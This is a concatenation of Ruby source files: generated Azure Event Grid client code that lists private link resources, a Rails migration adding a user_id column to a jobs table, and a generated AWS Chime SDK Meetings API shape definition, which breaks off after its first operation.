def list_by_resource_with_http_info(resource_group_name, parent_type, parent_name, filter:nil, top:nil, custom_headers:nil)
list_by_resource_async(resource_group_name, parent_type, parent_name, filter:filter, top:top, custom_headers:custom_headers).value!
end
#
# List private link resources under specific topic or domain.
#
# List all the private link resources under a topic or domain.
#
# @param resource_group_name [String] The name of the resource group within the
# user's subscription.
# @param parent_type [String] The type of the parent resource. This can be
# either \'topics\' or \'domains\'.
# @param parent_name [String] The name of the parent resource (namely, either,
# the topic name or domain name).
# @param filter [String] The query used to filter the search results using
# OData syntax. Filtering is permitted on the 'name' property only and with
# limited number of OData operations. These operations are: the 'contains'
# function as well as the following logical operations: not, and, or, eq (for
# equal), and ne (for not equal). No arithmetic operations are supported. The
# following is a valid filter example: $filter=contains(namE, 'PATTERN') and
# name ne 'PATTERN-1'. The following is not a valid filter example:
# $filter=location eq 'westus'.
# @param top [Integer] The number of results to return per page for the list
# operation. Valid range for top parameter is 1 to 100. If not specified, the
# default number of results to be returned is 20 items per page.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_resource_async(resource_group_name, parent_type, parent_name, filter:nil, top:nil, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'parent_type is nil' if parent_type.nil?
fail ArgumentError, 'parent_name is nil' if parent_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/{parentType}/{parentName}/privateLinkResources'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'parentType' => parent_type,'parentName' => parent_name},
query_params: {'api-version' => @client.api_version,'$filter' => filter,'$top' => top},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::EventGrid::Mgmt::V2020_06_01::Models::PrivateLinkResourcesListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# List private link resources under specific topic or domain.
#
# List all the private link resources under a topic or domain.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PrivateLinkResourcesListResult] operation results.
#
def list_by_resource_next(next_page_link, custom_headers:nil)
response = list_by_resource_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# List private link resources under specific topic or domain.
#
# List all the private link resources under a topic or domain.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_resource_next_with_http_info(next_page_link, custom_headers:nil)
list_by_resource_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# List private link resources under specific topic or domain.
#
# List all the private link resources under a topic or domain.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_resource_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::EventGrid::Mgmt::V2020_06_01::Models::PrivateLinkResourcesListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# List private link resources under specific topic or domain.
#
# List all the private link resources under a topic or domain.
#
# @param resource_group_name [String] The name of the resource group within the
# user's subscription.
# @param parent_type [String] The type of the parent resource. This can be
# either \'topics\' or \'domains\'.
# @param parent_name [String] The name of the parent resource (namely, either,
# the topic name or domain name).
# @param filter [String] The query used to filter the search results using
# OData syntax. Filtering is permitted on the 'name' property only and with
# limited number of OData operations. These operations are: the 'contains'
# function as well as the following logical operations: not, and, or, eq (for
# equal), and ne (for not equal). No arithmetic operations are supported. The
# following is a valid filter example: $filter=contains(namE, 'PATTERN') and
# name ne 'PATTERN-1'. The following is not a valid filter example:
# $filter=location eq 'westus'.
# @param top [Integer] The number of results to return per page for the list
# operation. Valid range for top parameter is 1 to 100. If not specified, the
# default number of results to be returned is 20 items per page.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PrivateLinkResourcesListResult] which provide lazy access to pages
# of the response.
#
def list_by_resource_as_lazy(resource_group_name, parent_type, parent_name, filter:nil, top:nil, custom_headers:nil)
response = list_by_resource_async(resource_group_name, parent_type, parent_name, filter:filter, top:top, custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_by_resource_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
end
end
| 48.792453 | 224 | 0.705095 |
1d187b139c70157302eca453d4f1422fc2cd877b | 117 | class AddUserIdToJobs < ActiveRecord::Migration[5.0]
def change
add_column :jobs, :user_id, :integer
end
end
| 19.5 | 52 | 0.735043 |
615fc1cf3148530fc28bebc3759c36f4e3e275e4 | 31,816 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
module Aws::ChimeSDKMeetings
# @api private
module ClientApi
include Seahorse::Model
Arn = Shapes::StringShape.new(name: 'Arn')
Attendee = Shapes::StructureShape.new(name: 'Attendee')
AttendeeList = Shapes::ListShape.new(name: 'AttendeeList')
AudioFeatures = Shapes::StructureShape.new(name: 'AudioFeatures')
BadRequestException = Shapes::StructureShape.new(name: 'BadRequestException')
BatchCreateAttendeeErrorList = Shapes::ListShape.new(name: 'BatchCreateAttendeeErrorList')
BatchCreateAttendeeRequest = Shapes::StructureShape.new(name: 'BatchCreateAttendeeRequest')
BatchCreateAttendeeResponse = Shapes::StructureShape.new(name: 'BatchCreateAttendeeResponse')
Boolean = Shapes::BooleanShape.new(name: 'Boolean')
ClientRequestToken = Shapes::StringShape.new(name: 'ClientRequestToken')
CreateAttendeeError = Shapes::StructureShape.new(name: 'CreateAttendeeError')
CreateAttendeeRequest = Shapes::StructureShape.new(name: 'CreateAttendeeRequest')
CreateAttendeeRequestItem = Shapes::StructureShape.new(name: 'CreateAttendeeRequestItem')
CreateAttendeeRequestItemList = Shapes::ListShape.new(name: 'CreateAttendeeRequestItemList')
CreateAttendeeResponse = Shapes::StructureShape.new(name: 'CreateAttendeeResponse')
CreateMeetingRequest = Shapes::StructureShape.new(name: 'CreateMeetingRequest')
CreateMeetingResponse = Shapes::StructureShape.new(name: 'CreateMeetingResponse')
CreateMeetingWithAttendeesRequest = Shapes::StructureShape.new(name: 'CreateMeetingWithAttendeesRequest')
CreateMeetingWithAttendeesRequestItemList = Shapes::ListShape.new(name: 'CreateMeetingWithAttendeesRequestItemList')
CreateMeetingWithAttendeesResponse = Shapes::StructureShape.new(name: 'CreateMeetingWithAttendeesResponse')
DeleteAttendeeRequest = Shapes::StructureShape.new(name: 'DeleteAttendeeRequest')
DeleteMeetingRequest = Shapes::StructureShape.new(name: 'DeleteMeetingRequest')
EngineTranscribeMedicalSettings = Shapes::StructureShape.new(name: 'EngineTranscribeMedicalSettings')
EngineTranscribeSettings = Shapes::StructureShape.new(name: 'EngineTranscribeSettings')
ExternalMeetingId = Shapes::StringShape.new(name: 'ExternalMeetingId')
ExternalUserId = Shapes::StringShape.new(name: 'ExternalUserId')
ForbiddenException = Shapes::StructureShape.new(name: 'ForbiddenException')
GetAttendeeRequest = Shapes::StructureShape.new(name: 'GetAttendeeRequest')
GetAttendeeResponse = Shapes::StructureShape.new(name: 'GetAttendeeResponse')
GetMeetingRequest = Shapes::StructureShape.new(name: 'GetMeetingRequest')
GetMeetingResponse = Shapes::StructureShape.new(name: 'GetMeetingResponse')
GuidString = Shapes::StringShape.new(name: 'GuidString')
JoinTokenString = Shapes::StringShape.new(name: 'JoinTokenString')
LimitExceededException = Shapes::StructureShape.new(name: 'LimitExceededException')
ListAttendeesRequest = Shapes::StructureShape.new(name: 'ListAttendeesRequest')
ListAttendeesResponse = Shapes::StructureShape.new(name: 'ListAttendeesResponse')
MediaPlacement = Shapes::StructureShape.new(name: 'MediaPlacement')
MediaRegion = Shapes::StringShape.new(name: 'MediaRegion')
Meeting = Shapes::StructureShape.new(name: 'Meeting')
MeetingFeatureStatus = Shapes::StringShape.new(name: 'MeetingFeatureStatus')
MeetingFeaturesConfiguration = Shapes::StructureShape.new(name: 'MeetingFeaturesConfiguration')
NotFoundException = Shapes::StructureShape.new(name: 'NotFoundException')
NotificationsConfiguration = Shapes::StructureShape.new(name: 'NotificationsConfiguration')
ResultMax = Shapes::IntegerShape.new(name: 'ResultMax')
RetryAfterSeconds = Shapes::StringShape.new(name: 'RetryAfterSeconds')
ServiceUnavailableException = Shapes::StructureShape.new(name: 'ServiceUnavailableException')
StartMeetingTranscriptionRequest = Shapes::StructureShape.new(name: 'StartMeetingTranscriptionRequest')
StopMeetingTranscriptionRequest = Shapes::StructureShape.new(name: 'StopMeetingTranscriptionRequest')
String = Shapes::StringShape.new(name: 'String')
TranscribeContentIdentificationType = Shapes::StringShape.new(name: 'TranscribeContentIdentificationType')
TranscribeContentRedactionType = Shapes::StringShape.new(name: 'TranscribeContentRedactionType')
TranscribeLanguageCode = Shapes::StringShape.new(name: 'TranscribeLanguageCode')
TranscribeLanguageModelName = Shapes::StringShape.new(name: 'TranscribeLanguageModelName')
TranscribeMedicalContentIdentificationType = Shapes::StringShape.new(name: 'TranscribeMedicalContentIdentificationType')
TranscribeMedicalLanguageCode = Shapes::StringShape.new(name: 'TranscribeMedicalLanguageCode')
TranscribeMedicalRegion = Shapes::StringShape.new(name: 'TranscribeMedicalRegion')
TranscribeMedicalSpecialty = Shapes::StringShape.new(name: 'TranscribeMedicalSpecialty')
TranscribeMedicalType = Shapes::StringShape.new(name: 'TranscribeMedicalType')
TranscribePartialResultsStability = Shapes::StringShape.new(name: 'TranscribePartialResultsStability')
TranscribePiiEntityTypes = Shapes::StringShape.new(name: 'TranscribePiiEntityTypes')
TranscribeRegion = Shapes::StringShape.new(name: 'TranscribeRegion')
TranscribeVocabularyFilterMethod = Shapes::StringShape.new(name: 'TranscribeVocabularyFilterMethod')
TranscriptionConfiguration = Shapes::StructureShape.new(name: 'TranscriptionConfiguration')
UnauthorizedException = Shapes::StructureShape.new(name: 'UnauthorizedException')
UnprocessableEntityException = Shapes::StructureShape.new(name: 'UnprocessableEntityException')
Attendee.add_member(:external_user_id, Shapes::ShapeRef.new(shape: ExternalUserId, location_name: "ExternalUserId"))
Attendee.add_member(:attendee_id, Shapes::ShapeRef.new(shape: GuidString, location_name: "AttendeeId"))
Attendee.add_member(:join_token, Shapes::ShapeRef.new(shape: JoinTokenString, location_name: "JoinToken"))
Attendee.struct_class = Types::Attendee
AttendeeList.member = Shapes::ShapeRef.new(shape: Attendee)
AudioFeatures.add_member(:echo_reduction, Shapes::ShapeRef.new(shape: MeetingFeatureStatus, location_name: "EchoReduction"))
AudioFeatures.struct_class = Types::AudioFeatures
BadRequestException.add_member(:code, Shapes::ShapeRef.new(shape: String, location_name: "Code"))
BadRequestException.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "Message"))
BadRequestException.add_member(:request_id, Shapes::ShapeRef.new(shape: String, location_name: "RequestId"))
BadRequestException.struct_class = Types::BadRequestException
BatchCreateAttendeeErrorList.member = Shapes::ShapeRef.new(shape: CreateAttendeeError)
BatchCreateAttendeeRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
BatchCreateAttendeeRequest.add_member(:attendees, Shapes::ShapeRef.new(shape: CreateAttendeeRequestItemList, required: true, location_name: "Attendees"))
BatchCreateAttendeeRequest.struct_class = Types::BatchCreateAttendeeRequest
BatchCreateAttendeeResponse.add_member(:attendees, Shapes::ShapeRef.new(shape: AttendeeList, location_name: "Attendees"))
BatchCreateAttendeeResponse.add_member(:errors, Shapes::ShapeRef.new(shape: BatchCreateAttendeeErrorList, location_name: "Errors"))
BatchCreateAttendeeResponse.struct_class = Types::BatchCreateAttendeeResponse
CreateAttendeeError.add_member(:external_user_id, Shapes::ShapeRef.new(shape: ExternalUserId, location_name: "ExternalUserId"))
CreateAttendeeError.add_member(:error_code, Shapes::ShapeRef.new(shape: String, location_name: "ErrorCode"))
CreateAttendeeError.add_member(:error_message, Shapes::ShapeRef.new(shape: String, location_name: "ErrorMessage"))
CreateAttendeeError.struct_class = Types::CreateAttendeeError
CreateAttendeeRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
CreateAttendeeRequest.add_member(:external_user_id, Shapes::ShapeRef.new(shape: ExternalUserId, required: true, location_name: "ExternalUserId"))
CreateAttendeeRequest.struct_class = Types::CreateAttendeeRequest
CreateAttendeeRequestItem.add_member(:external_user_id, Shapes::ShapeRef.new(shape: ExternalUserId, required: true, location_name: "ExternalUserId"))
CreateAttendeeRequestItem.struct_class = Types::CreateAttendeeRequestItem
CreateAttendeeRequestItemList.member = Shapes::ShapeRef.new(shape: CreateAttendeeRequestItem)
CreateAttendeeResponse.add_member(:attendee, Shapes::ShapeRef.new(shape: Attendee, location_name: "Attendee"))
CreateAttendeeResponse.struct_class = Types::CreateAttendeeResponse
CreateMeetingRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, required: true, location_name: "ClientRequestToken", metadata: {"idempotencyToken"=>true}))
CreateMeetingRequest.add_member(:media_region, Shapes::ShapeRef.new(shape: MediaRegion, required: true, location_name: "MediaRegion"))
CreateMeetingRequest.add_member(:meeting_host_id, Shapes::ShapeRef.new(shape: ExternalUserId, location_name: "MeetingHostId"))
CreateMeetingRequest.add_member(:external_meeting_id, Shapes::ShapeRef.new(shape: ExternalMeetingId, required: true, location_name: "ExternalMeetingId"))
CreateMeetingRequest.add_member(:notifications_configuration, Shapes::ShapeRef.new(shape: NotificationsConfiguration, location_name: "NotificationsConfiguration"))
CreateMeetingRequest.add_member(:meeting_features, Shapes::ShapeRef.new(shape: MeetingFeaturesConfiguration, location_name: "MeetingFeatures"))
CreateMeetingRequest.struct_class = Types::CreateMeetingRequest
CreateMeetingResponse.add_member(:meeting, Shapes::ShapeRef.new(shape: Meeting, location_name: "Meeting"))
CreateMeetingResponse.struct_class = Types::CreateMeetingResponse
CreateMeetingWithAttendeesRequest.add_member(:client_request_token, Shapes::ShapeRef.new(shape: ClientRequestToken, required: true, location_name: "ClientRequestToken", metadata: {"idempotencyToken"=>true}))
CreateMeetingWithAttendeesRequest.add_member(:media_region, Shapes::ShapeRef.new(shape: MediaRegion, required: true, location_name: "MediaRegion"))
CreateMeetingWithAttendeesRequest.add_member(:meeting_host_id, Shapes::ShapeRef.new(shape: ExternalUserId, location_name: "MeetingHostId"))
CreateMeetingWithAttendeesRequest.add_member(:external_meeting_id, Shapes::ShapeRef.new(shape: ExternalMeetingId, required: true, location_name: "ExternalMeetingId"))
CreateMeetingWithAttendeesRequest.add_member(:meeting_features, Shapes::ShapeRef.new(shape: MeetingFeaturesConfiguration, location_name: "MeetingFeatures"))
CreateMeetingWithAttendeesRequest.add_member(:notifications_configuration, Shapes::ShapeRef.new(shape: NotificationsConfiguration, location_name: "NotificationsConfiguration"))
CreateMeetingWithAttendeesRequest.add_member(:attendees, Shapes::ShapeRef.new(shape: CreateMeetingWithAttendeesRequestItemList, required: true, location_name: "Attendees"))
CreateMeetingWithAttendeesRequest.struct_class = Types::CreateMeetingWithAttendeesRequest
CreateMeetingWithAttendeesRequestItemList.member = Shapes::ShapeRef.new(shape: CreateAttendeeRequestItem)
CreateMeetingWithAttendeesResponse.add_member(:meeting, Shapes::ShapeRef.new(shape: Meeting, location_name: "Meeting"))
CreateMeetingWithAttendeesResponse.add_member(:attendees, Shapes::ShapeRef.new(shape: AttendeeList, location_name: "Attendees"))
CreateMeetingWithAttendeesResponse.add_member(:errors, Shapes::ShapeRef.new(shape: BatchCreateAttendeeErrorList, location_name: "Errors"))
CreateMeetingWithAttendeesResponse.struct_class = Types::CreateMeetingWithAttendeesResponse
DeleteAttendeeRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
DeleteAttendeeRequest.add_member(:attendee_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "AttendeeId"))
DeleteAttendeeRequest.struct_class = Types::DeleteAttendeeRequest
DeleteMeetingRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
DeleteMeetingRequest.struct_class = Types::DeleteMeetingRequest
EngineTranscribeMedicalSettings.add_member(:language_code, Shapes::ShapeRef.new(shape: TranscribeMedicalLanguageCode, required: true, location_name: "LanguageCode"))
EngineTranscribeMedicalSettings.add_member(:specialty, Shapes::ShapeRef.new(shape: TranscribeMedicalSpecialty, required: true, location_name: "Specialty"))
EngineTranscribeMedicalSettings.add_member(:type, Shapes::ShapeRef.new(shape: TranscribeMedicalType, required: true, location_name: "Type"))
EngineTranscribeMedicalSettings.add_member(:vocabulary_name, Shapes::ShapeRef.new(shape: String, location_name: "VocabularyName"))
EngineTranscribeMedicalSettings.add_member(:region, Shapes::ShapeRef.new(shape: TranscribeMedicalRegion, location_name: "Region"))
EngineTranscribeMedicalSettings.add_member(:content_identification_type, Shapes::ShapeRef.new(shape: TranscribeMedicalContentIdentificationType, location_name: "ContentIdentificationType"))
EngineTranscribeMedicalSettings.struct_class = Types::EngineTranscribeMedicalSettings
EngineTranscribeSettings.add_member(:language_code, Shapes::ShapeRef.new(shape: TranscribeLanguageCode, required: true, location_name: "LanguageCode"))
EngineTranscribeSettings.add_member(:vocabulary_filter_method, Shapes::ShapeRef.new(shape: TranscribeVocabularyFilterMethod, location_name: "VocabularyFilterMethod"))
EngineTranscribeSettings.add_member(:vocabulary_filter_name, Shapes::ShapeRef.new(shape: String, location_name: "VocabularyFilterName"))
EngineTranscribeSettings.add_member(:vocabulary_name, Shapes::ShapeRef.new(shape: String, location_name: "VocabularyName"))
EngineTranscribeSettings.add_member(:region, Shapes::ShapeRef.new(shape: TranscribeRegion, location_name: "Region"))
EngineTranscribeSettings.add_member(:enable_partial_results_stabilization, Shapes::ShapeRef.new(shape: Boolean, location_name: "EnablePartialResultsStabilization"))
EngineTranscribeSettings.add_member(:partial_results_stability, Shapes::ShapeRef.new(shape: TranscribePartialResultsStability, location_name: "PartialResultsStability"))
EngineTranscribeSettings.add_member(:content_identification_type, Shapes::ShapeRef.new(shape: TranscribeContentIdentificationType, location_name: "ContentIdentificationType"))
EngineTranscribeSettings.add_member(:content_redaction_type, Shapes::ShapeRef.new(shape: TranscribeContentRedactionType, location_name: "ContentRedactionType"))
EngineTranscribeSettings.add_member(:pii_entity_types, Shapes::ShapeRef.new(shape: TranscribePiiEntityTypes, location_name: "PiiEntityTypes"))
EngineTranscribeSettings.add_member(:language_model_name, Shapes::ShapeRef.new(shape: TranscribeLanguageModelName, location_name: "LanguageModelName"))
EngineTranscribeSettings.struct_class = Types::EngineTranscribeSettings
ForbiddenException.add_member(:code, Shapes::ShapeRef.new(shape: String, location_name: "Code"))
ForbiddenException.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "Message"))
ForbiddenException.add_member(:request_id, Shapes::ShapeRef.new(shape: String, location_name: "RequestId"))
ForbiddenException.struct_class = Types::ForbiddenException
GetAttendeeRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
GetAttendeeRequest.add_member(:attendee_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "AttendeeId"))
GetAttendeeRequest.struct_class = Types::GetAttendeeRequest
GetAttendeeResponse.add_member(:attendee, Shapes::ShapeRef.new(shape: Attendee, location_name: "Attendee"))
GetAttendeeResponse.struct_class = Types::GetAttendeeResponse
GetMeetingRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
GetMeetingRequest.struct_class = Types::GetMeetingRequest
GetMeetingResponse.add_member(:meeting, Shapes::ShapeRef.new(shape: Meeting, location_name: "Meeting"))
GetMeetingResponse.struct_class = Types::GetMeetingResponse
LimitExceededException.add_member(:code, Shapes::ShapeRef.new(shape: String, location_name: "Code"))
LimitExceededException.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "Message"))
LimitExceededException.add_member(:request_id, Shapes::ShapeRef.new(shape: String, location_name: "RequestId"))
LimitExceededException.struct_class = Types::LimitExceededException
ListAttendeesRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
ListAttendeesRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location: "querystring", location_name: "next-token"))
ListAttendeesRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: ResultMax, location: "querystring", location_name: "max-results"))
ListAttendeesRequest.struct_class = Types::ListAttendeesRequest
ListAttendeesResponse.add_member(:attendees, Shapes::ShapeRef.new(shape: AttendeeList, location_name: "Attendees"))
ListAttendeesResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "NextToken"))
ListAttendeesResponse.struct_class = Types::ListAttendeesResponse
MediaPlacement.add_member(:audio_host_url, Shapes::ShapeRef.new(shape: String, location_name: "AudioHostUrl"))
MediaPlacement.add_member(:audio_fallback_url, Shapes::ShapeRef.new(shape: String, location_name: "AudioFallbackUrl"))
MediaPlacement.add_member(:signaling_url, Shapes::ShapeRef.new(shape: String, location_name: "SignalingUrl"))
MediaPlacement.add_member(:turn_control_url, Shapes::ShapeRef.new(shape: String, location_name: "TurnControlUrl"))
MediaPlacement.add_member(:screen_data_url, Shapes::ShapeRef.new(shape: String, location_name: "ScreenDataUrl"))
MediaPlacement.add_member(:screen_viewing_url, Shapes::ShapeRef.new(shape: String, location_name: "ScreenViewingUrl"))
MediaPlacement.add_member(:screen_sharing_url, Shapes::ShapeRef.new(shape: String, location_name: "ScreenSharingUrl"))
MediaPlacement.add_member(:event_ingestion_url, Shapes::ShapeRef.new(shape: String, location_name: "EventIngestionUrl"))
MediaPlacement.struct_class = Types::MediaPlacement
Meeting.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, location_name: "MeetingId"))
Meeting.add_member(:meeting_host_id, Shapes::ShapeRef.new(shape: ExternalUserId, location_name: "MeetingHostId"))
Meeting.add_member(:external_meeting_id, Shapes::ShapeRef.new(shape: ExternalMeetingId, location_name: "ExternalMeetingId"))
Meeting.add_member(:media_region, Shapes::ShapeRef.new(shape: MediaRegion, location_name: "MediaRegion"))
Meeting.add_member(:media_placement, Shapes::ShapeRef.new(shape: MediaPlacement, location_name: "MediaPlacement"))
Meeting.add_member(:meeting_features, Shapes::ShapeRef.new(shape: MeetingFeaturesConfiguration, location_name: "MeetingFeatures"))
Meeting.struct_class = Types::Meeting
MeetingFeaturesConfiguration.add_member(:audio, Shapes::ShapeRef.new(shape: AudioFeatures, location_name: "Audio"))
MeetingFeaturesConfiguration.struct_class = Types::MeetingFeaturesConfiguration
NotFoundException.add_member(:code, Shapes::ShapeRef.new(shape: String, location_name: "Code"))
NotFoundException.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "Message"))
NotFoundException.add_member(:request_id, Shapes::ShapeRef.new(shape: String, location_name: "RequestId"))
NotFoundException.struct_class = Types::NotFoundException
NotificationsConfiguration.add_member(:lambda_function_arn, Shapes::ShapeRef.new(shape: Arn, location_name: "LambdaFunctionArn"))
NotificationsConfiguration.add_member(:sns_topic_arn, Shapes::ShapeRef.new(shape: Arn, location_name: "SnsTopicArn"))
NotificationsConfiguration.add_member(:sqs_queue_arn, Shapes::ShapeRef.new(shape: Arn, location_name: "SqsQueueArn"))
NotificationsConfiguration.struct_class = Types::NotificationsConfiguration
ServiceUnavailableException.add_member(:code, Shapes::ShapeRef.new(shape: String, location_name: "Code"))
ServiceUnavailableException.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "Message"))
ServiceUnavailableException.add_member(:request_id, Shapes::ShapeRef.new(shape: String, location_name: "RequestId"))
ServiceUnavailableException.add_member(:retry_after_seconds, Shapes::ShapeRef.new(shape: RetryAfterSeconds, location: "header", location_name: "Retry-After"))
ServiceUnavailableException.struct_class = Types::ServiceUnavailableException
StartMeetingTranscriptionRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
StartMeetingTranscriptionRequest.add_member(:transcription_configuration, Shapes::ShapeRef.new(shape: TranscriptionConfiguration, required: true, location_name: "TranscriptionConfiguration"))
StartMeetingTranscriptionRequest.struct_class = Types::StartMeetingTranscriptionRequest
StopMeetingTranscriptionRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
StopMeetingTranscriptionRequest.struct_class = Types::StopMeetingTranscriptionRequest
TranscriptionConfiguration.add_member(:engine_transcribe_settings, Shapes::ShapeRef.new(shape: EngineTranscribeSettings, location_name: "EngineTranscribeSettings"))
TranscriptionConfiguration.add_member(:engine_transcribe_medical_settings, Shapes::ShapeRef.new(shape: EngineTranscribeMedicalSettings, location_name: "EngineTranscribeMedicalSettings"))
TranscriptionConfiguration.struct_class = Types::TranscriptionConfiguration
UnauthorizedException.add_member(:code, Shapes::ShapeRef.new(shape: String, location_name: "Code"))
UnauthorizedException.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "Message"))
UnauthorizedException.add_member(:request_id, Shapes::ShapeRef.new(shape: String, location_name: "RequestId"))
UnauthorizedException.struct_class = Types::UnauthorizedException
UnprocessableEntityException.add_member(:code, Shapes::ShapeRef.new(shape: String, location_name: "Code"))
UnprocessableEntityException.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "Message"))
UnprocessableEntityException.add_member(:request_id, Shapes::ShapeRef.new(shape: String, location_name: "RequestId"))
UnprocessableEntityException.struct_class = Types::UnprocessableEntityException
# @api private
API = Seahorse::Model::Api.new.tap do |api|
api.version = "2021-07-15"
api.metadata = {
"apiVersion" => "2021-07-15",
"endpointPrefix" => "meetings-chime",
"protocol" => "rest-json",
"serviceFullName" => "Amazon Chime SDK Meetings",
"serviceId" => "Chime SDK Meetings",
"signatureVersion" => "v4",
"signingName" => "chime",
"uid" => "chime-sdk-meetings-2021-07-15",
}
api.add_operation(:batch_create_attendee, Seahorse::Model::Operation.new.tap do |o|
o.name = "BatchCreateAttendee"
o.http_method = "POST"
o.http_request_uri = "/meetings/{MeetingId}/attendees?operation=batch-create"
o.input = Shapes::ShapeRef.new(shape: BatchCreateAttendeeRequest)
o.output = Shapes::ShapeRef.new(shape: BatchCreateAttendeeResponse)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: UnauthorizedException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
o.errors << Shapes::ShapeRef.new(shape: LimitExceededException)
end)
